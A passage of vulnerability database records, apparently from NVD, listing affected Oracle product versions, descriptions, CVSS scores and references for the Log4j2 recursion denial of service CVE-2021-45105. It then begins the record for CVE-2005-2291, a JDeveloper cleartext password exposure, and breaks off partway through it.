"cpe:2.3:a:oracle:hospitality_suite8:8.14.0:*:*:*:*:*:*:*", matchCriteriaId: "AD7E9060-BA5B-4682-AC0D-EE5105AD0332", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_token_proxy_service:19.2:*:*:*:*:*:*:*", matchCriteriaId: "E7D45E2D-241B-4839-B255-A81107BF94BF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_bi\\+:*:*:*:*:*:*:*:*", matchCriteriaId: "9C083F1E-8BF2-48C7-92FB-BD105905258E", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_planning:*:*:*:*:*:*:*:*", matchCriteriaId: "C3E11E28-78AA-42BB-927D-D22CBDDD62B9", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_profitability_and_cost_management:*:*:*:*:*:*:*:*", matchCriteriaId: "30927787-2815-4BEF-A7C2-960F92238303", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_tax_provision:*:*:*:*:*:*:*:*", matchCriteriaId: "C0ABD2DC-9357-4097-BE62-BB7A4988A01F", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:9.1.0:*:*:*:*:*:*:*", matchCriteriaId: "8508EF23-43DC-431F-B410-FD0BA897C371", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", matchCriteriaId: "82EA4BA7-C38B-4AF3-8914-9E3D089EBDD4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", matchCriteriaId: "B9C9BC66-FA5F-4774-9BDA-7AB88E2839C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", matchCriteriaId: "7F69B9A5-F21B-4904-9F27-95C0F7A628E3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_data_gateway:1.0.1:*:*:*:*:*:*:*", matchCriteriaId: "1B85A426-5714-4CEA-8A97-720F882B2D58", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*", matchCriteriaId: "604FBBC9-04DC-49D2-AB7A-6124256431AF", versionEndIncluding: "5.6.0.0", versionStartIncluding: "5.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2.0:*:*:*:*:*:*:*", matchCriteriaId: "428D2B1D-CFFD-49D1-BC05-2D85D22004DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5B8AA91A-1880-43CD-938D-48EF58ACF2CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:managed_file_transfer:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "A2E3E923-E2AD-400D-A618-26ADF7F841A2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:managed_file_transfer:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9AB58D27-37F2-4A32-B786-3490024290A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:management_cloud_engine:1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "3F66C747-733F-46A1-9A6B-EEB1A1AEC45D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:payment_interface:19.1:*:*:*:*:*:*:*", matchCriteriaId: "5D01A0EC-3846-4A74-A174-3797078DC699", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:payment_interface:20.3:*:*:*:*:*:*:*", matchCriteriaId: "03E5FCFB-093A-48E9-8A4E-34C993D2764E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*", matchCriteriaId: "C8AF00C6-B97F-414D-A8DF-057E6BFD8597", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "8B1C88FD-C2EC-4C96-AC7E-6F95C8763B48", versionEndIncluding: "17.12.11", versionStartIncluding: "17.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "A621A5AE-6974-4BA5-B1AC-7130A46F68F5", versionEndIncluding: "18.8.13", versionStartIncluding: "18.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "4096281D-2EBA-490D-8180-3C9D05EB890A", versionEndIncluding: "19.12.12", versionStartIncluding: "19.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "E6B70E72-B9FC-4E49-8EDD-29C7E14F5792", versionEndIncluding: "20.12.7", versionStartIncluding: "20.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:21.12.0:*:*:*:*:*:*:*", matchCriteriaId: "15F45363-236B-4040-8AE4-C6C0E204EDBA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "AD0DEC50-F4CD-4ACA-A118-D4F0D4F4C981", versionEndIncluding: "19.12.18.0", versionStartIncluding: "19.12.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "651104CE-0569-4E6D-ACAB-AD2AC85084DD", versionEndIncluding: "20.12.12.0", versionStartIncluding: "20.12.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:21.12.0.0:*:*:*:*:*:*:*", matchCriteriaId: "45D89239-9142-46BD-846D-76A5A74A67B1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", matchCriteriaId: "10864586-270E-4ACF-BDCC-ECFCD299305F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:20.12:*:*:*:*:*:*:*", matchCriteriaId: "38340E3C-C452-4370-86D4-355B6B4E0A06", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:21.12:*:*:*:*:*:*:*", matchCriteriaId: "E9C55C69-E22E-4B80-9371-5CD821D79FE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "F0735989-13BD-40B3-B954-AC0529C5B53D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "58405263-E84C-4071-BB23-165D49034A00", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:15.0.2:*:*:*:*:*:*:*", matchCriteriaId: "3D1C35DF-D30D-42C8-B56D-C809609AB2A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:16.0.2:*:*:*:*:*:*:*", matchCriteriaId: "834B4CE7-042E-489F-AE19-0EEA2C37E7A8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_data_extractor_for_merchandising:15.0.2:*:*:*:*:*:*:*", matchCriteriaId: "82653579-FF7D-4492-9CA2-B3DF6A708831", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_data_extractor_for_merchandising:16.0.2:*:*:*:*:*:*:*", matchCriteriaId: "32D2EB48-F9A2-4D23-81C5-4B30F2D785DF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F3796186-D3A7-4259-846B-165AD9CEB7F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:17.0.2:*:*:*:*:*:*:*", matchCriteriaId: "CEDA5540-692D-47DA-9F68-83158D9AE628", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:18.0.1:*:*:*:*:*:*:*", matchCriteriaId: "C5435583-C454-4AC9-8A35-D2D30EB252EE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A2140357-503A-4D2A-A099-CFA4DC649E41", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:20.0.1:*:*:*:*:*:*:*", matchCriteriaId: "6BAE5686-8E11-4EF1-BC7E-5C565F2440C7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_eftlink:21.0.0:*:*:*:*:*:*:*", matchCriteriaId: "F4B95628-F108-424A-8C19-40A5F5B7D37B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:*:*:*:*:*:*:*:*", matchCriteriaId: "1E03B340-8C77-4DFA-8536-C57656E237D0", versionEndIncluding: "16.0.3", versionStartIncluding: "16.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:14.1.3.2:*:*:*:*:*:*:*", matchCriteriaId: "798E4FEE-9B2B-436E-A2B3-B8AA1079892A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:15.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "CB86F6C3-981E-4ECA-A5EB-9A9CD73D70C9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:19.0.0:*:*:*:*:*:*:*", matchCriteriaId: "4B7B0B33-2361-4CF5-8075-F609858A582E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_financial_integration:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "7435071D-0C95-4686-A978-AFC4C9A0D0FE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:*:*:*:*:*:*:*:*", matchCriteriaId: "A921C710-1C59-429F-B985-67C0DBFD695E", versionEndIncluding: "16.0.3", versionStartIncluding: "16.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:*:*:*:*:*:*:*:*", matchCriteriaId: "B9E458AF-0EEC-453E-AA9D-6C79211000AC", versionEndIncluding: "19.0.1.0", versionStartIncluding: "19.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:14.1.3:*:*:*:*:*:*:*", matchCriteriaId: "F1AFAE16-B69F-410A-8CE3-1CDD998A8433", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:14.1.3.2:*:*:*:*:*:*:*", matchCriteriaId: "8CFCE558-9972-46A2-8539-C16044F1BAA9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:15.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A1194C4E-CF42-4B4D-BA9A-40FDD28F1D58", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:19.0.0:*:*:*:*:*:*:*", matchCriteriaId: "DFDF4CB0-4680-449A-8576-915721D59500", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "BD311C33-A309-44D5-BBFB-539D72C7F8C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_invoice_matching:15.0.3:*:*:*:*:*:*:*", matchCriteriaId: "A0472632-4104-4397-B619-C4E86A748465", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_invoice_matching:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "48E25E7C-F7E8-4739-8251-00ACD11C12FE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F8383028-B719-41FD-9B6A-71F8EB4C5F8D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "AE1BC44A-F0AF-41CD-9CEB-B07AB5ADAB38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", matchCriteriaId: "38E74E68-7F19-4EF3-AC00-3C249EAAA39E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:18.0:*:*:*:*:*:*:*", matchCriteriaId: "0783F0D1-8FAC-4BCA-A6F5-C5C60E86D56D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:19.1:*:*:*:*:*:*:*", matchCriteriaId: "C7BD0D41-1BED-4C4F-95C8-8987C98908DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_management_system:19.5:*:*:*:*:*:*:*", matchCriteriaId: "99B5DC78-1C24-4F2B-A254-D833FAF47013", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*", matchCriteriaId: "E13DF2AE-F315-4085-9172-6C8B21AF1C9E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:14.1.3.46:*:*:*:*:*:*:*", matchCriteriaId: "9002379B-4FDA-44F3-98EB-0C9B6083E429", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3.115:*:*:*:*:*:*:*", matchCriteriaId: "476B038D-7F60-482D-87AD-B58BEA35558E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:16.0.3.240:*:*:*:*:*:*:*", matchCriteriaId: "AB86C644-7B79-4F87-A06D-C178E8C2B8B4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:13.2:*:*:*:*:*:*:*", matchCriteriaId: "C19C5CC9-544A-4E4D-8F0A-579BB5270F07", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:14.0.4:*:*:*:*:*:*:*", matchCriteriaId: "3E1A9B0C-735A-40B4-901C-663CF5162E96", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:14.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "0791694C-9B4E-42EA-8F6C-899B43B6D769", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:15.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "312992F0-E65A-4E38-A44C-363A7E157CE4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:16.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E1940FD6-39FA-4F92-9625-F215D8051E80", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", matchCriteriaId: "BDB925C6-2CBC-4D88-B9EA-F246F4F7A206", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:*:*:*:*:*:*:*:*", matchCriteriaId: "0CE45891-A6A5-4699-90A6-6F49E60A7987", versionEndIncluding: "16.0.3", versionStartIncluding: "16.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:14.1.3:*:*:*:*:*:*:*", matchCriteriaId: "D7FCC976-615C-4DE5-9F50-1B25E9553962", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:14.1.3.2:*:*:*:*:*:*:*", matchCriteriaId: "E702EBED-DB39-4084-84B1-258BC5FE7545", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:15.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "3F7956BF-D5B6-484B-999C-36B45CD8B75B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:19.0.0:*:*:*:*:*:*:*", matchCriteriaId: "0D14A54A-4B04-41DE-B731-844D8AC3BE23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "9DA6B655-A445-42E5-B6D9-70AB1C04774A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:19.0.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5D57F5CB-E566-450F-B7D7-DD771F7C746C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:14.0.4.13:*:*:*:*:*:*:*", matchCriteriaId: "88458537-6DE8-4D79-BC71-9D08883AD0C1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:14.1.3.5:*:*:*:*:*:*:*", matchCriteriaId: "2E310654-0793-41CC-B049-C754AC31D016", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:14.1.3.14:*:*:*:*:*:*:*", matchCriteriaId: "4C5B22C6-97AF-4D1B-84C9-987C6F62C401", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:15.0.3.3:*:*:*:*:*:*:*", matchCriteriaId: "FFD9AAE5-9472-49C6-B054-DB76BEB86D35", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:15.0.3.8:*:*:*:*:*:*:*", matchCriteriaId: "A104FDBD-0B28-44EE-91A0-A0C8939865A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_store_inventory_management:16.0.3.7:*:*:*:*:*:*:*", matchCriteriaId: "C2D60A4D-BB4F-4177-AFA8-A8DC8C111FB3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "889916ED-5EB2-49D6-8400-E6DBBD6C287F", versionEndIncluding: "21.12", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:sql_developer:*:*:*:*:*:*:*:*", matchCriteriaId: "1C470BAD-F7E2-4802-B1BE-E71EBB073DA1", versionEndExcluding: "21.4.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:taleo_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "4E1A18FB-85E6-4C5D-8F8A-12F86EDC6A2D", versionEndExcluding: "22.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "51309958-121D-4649-AB9A-EBFA3A49F7CB", versionEndIncluding: "4.3.0.6.0", versionStartIncluding: "4.3.0.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "3F906F04-39E4-4BE4-8A73-9D058AAADB43", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*", matchCriteriaId: "7B393A82-476A-4270-A903-38ED4169E431", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "85CAE52B-C2CA-4C6B-A0B7-2B9D6F0499E2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "5A502118-5B2B-47AE-82EC-1999BD841103", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D551CAB1-4312-44AA-BDA8-A030817E153A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "174A6D2E-E42E-4C92-A194-C6A820CD7EF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.", }, { lang: "es", value: "Apache Log4j2 versiones 2.0-alpha1 hasta 2.16.0 (excluyendo las versiones 2.12.3 y 2.3.1) no protegían de la recursión no controlada de las búsquedas autorreferenciales. Esto permite a un atacante con control sobre los datos de Thread Context Map causar una denegación de servicio cuando es interpretada una cadena diseñada. Este problema se ha corregido en Log4j versiones 2.17.0, 2.12.3 y 2.3.1", }, ], id: "CVE-2021-45105", lastModified: "2024-11-21T06:31:58.170", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:M/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 2.2, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2021-12-18T12:15:07.433", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Mitigation", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { source: "security@apache.org", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://logging.apache.org/log4j/2.x/security.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2021/dsa-5024", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "US Government Resource", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Mitigation", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://logging.apache.org/log4j/2.x/security.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2021/dsa-5024", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "US Government Resource", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-20", }, { lang: "en", value: "CWE-674", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-20", }, { lang: "en", value: "CWE-674", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2005-07-18 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 passes the cleartext password as a parameter when starting sqlplus, which allows local users to gain sensitive information.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | jdeveloper | 9.0.4 | |
| oracle | jdeveloper | 9.0.5 | |
| oracle | jdeveloper | 10.1.2 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:9.0.4:*:*:*:*:*:*:*", matchCriteriaId: "E292E294-90C2-4780-82B6-1265F8FF6040", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:9.0.5:*:*:*:*:*:*:*", matchCriteriaId: "A5EA5B15-5ABD-459D-8327-9DDC1040C04D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:10.1.2:*:*:*:*:*:*:*", matchCriteriaId: "A4C7F9B0-2BF0-430D-ACB3-8E3A41AD31A3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 passes the cleartext password as a parameter when starting sqlplus, which allows local users to gain sensitive information.", }, { lang: "es", value: "Oracle JDeveloper 9.0.4, 9.0.5, y 10.1.2 pasa el password en texto plano como parámetro cuando arranca \"sqlplus\", lo que permite que usuarios locales obtengan información confidencial.", }, ], id: "CVE-2005-2291", lastModified: "2025-04-03T01:03:51.193", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", 